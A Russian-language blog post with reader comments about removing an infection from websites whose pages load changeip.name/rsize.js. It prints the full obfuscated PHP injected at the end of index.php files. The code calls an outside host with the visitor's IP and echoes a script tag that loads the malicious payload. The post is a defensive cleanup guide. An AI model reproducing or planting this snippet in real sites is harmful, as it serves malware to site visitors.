Если антивирусные программы ругаются на ваш сайт, выдают сообщение «Сайт может угрожать вашему компьютеру» и упоминают changeip.name/rsize.js, то вы попали по адресу. Сегодня будем лечить сайты от подобной заразы. В моём случае попросили посмотреть зараженный сайт, который подтягивал JavaScript расположенный по адресу changeip.changeip.name/rsize.js, но как показала практика, могут быть и другие варианты: newdomme.changeip.name/rsize.js, feelthesame.changeip.name/rsize.js, kinoshkaxa.changeip.name/rsize.js или newdom.changeip.name/rsize.js
Как выяснилось, чаще всего страдают пользователи сайтов, которые используют joomla. Есть еще одна беда в виде FileZilla. Не уверен, что официальная версия встраивает вирусы. Скорее всего версия, которая подправлена злоумышленниками, распространяемая в интернете, как самая последняя и «проверенная» всеми антивирусами. В общем, надо быть внимательным при скачивании софта из интернета.
Вернемся к удалению заразы с сайта. Как я уже говорил, у моего клиента возникла проблема с появлением сообщения о том, что сайт заражен и упоминанием changeip.changeip.name/rsize.js. На сайте не использовалось специфического движка и понять где искать вредоносный код не составила труда. Заражению были подвержены все index.php сайта.
Следующий код добавлялся в самый конец файла:
<? function sql2_safe($in) {
$rtn = base64_decode($in);
return $rtn;
}
function collectnewss() {
if (!isset($_COOKIE["iJijkdaMnerys"])) {
$value = 'yadeor';
$ip = $_SERVER['REMOTE_ADDR'];
$get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
$file = @fopen ($get, "r");
$content = @fread($file, 1000);
@setcookie("iJijkdaMnerys", $value, time()+3600*24);
if (!$content)
echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9jaGFuZ2VpcC5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
else
echo $content;
}
}
collectnewss ();
?>
Удалил его, порекомендовал сменить ftp-клиент, пароль на доступ и проверить свой компьютер на вирусы. Если вы сталкнулись с подобной проблемой, но не получается её победить, то задавайте вопросы и я постараюсь вам помочь.
Сейчас мучаюсь с этим же вирусом. Движок WP, но в файлах темы нет кода. Где его еще можно найти?
Еще стоит посмотреть во всех файлах с именем index.php. Обычно вирус внедряется в конец файла. Попробуйте воспользоваться поиском по файлам.